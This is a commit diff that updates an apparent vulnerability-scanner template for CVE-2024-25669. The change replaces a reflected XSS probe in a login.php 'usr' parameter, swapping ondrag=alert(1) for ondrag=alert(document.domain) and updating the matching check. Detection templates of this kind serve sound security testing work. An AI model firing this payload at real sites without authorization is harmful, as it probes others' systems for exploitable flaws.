payload/matcher update

projectdiscovery · Aug 29, 2024 · c3bb19a · c3bb19a
1 parent bdc09d6
commit c3bb19a
Showing 1 changed file with 2 additions and 2 deletions.
diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml
@@ -33,14 +33,14 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(1)%20value=%27p"
+      - "{{BaseURL}}/login.php?mid=0&usr=test%27%20draggable=true%20ondrag=alert(document.domain)%20value=%27p"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "value='test' draggable=true ondrag=alert(1)"
+          - "value='test' draggable=true ondrag=alert(document.domain)"
           - "CaseAware"
         condition: and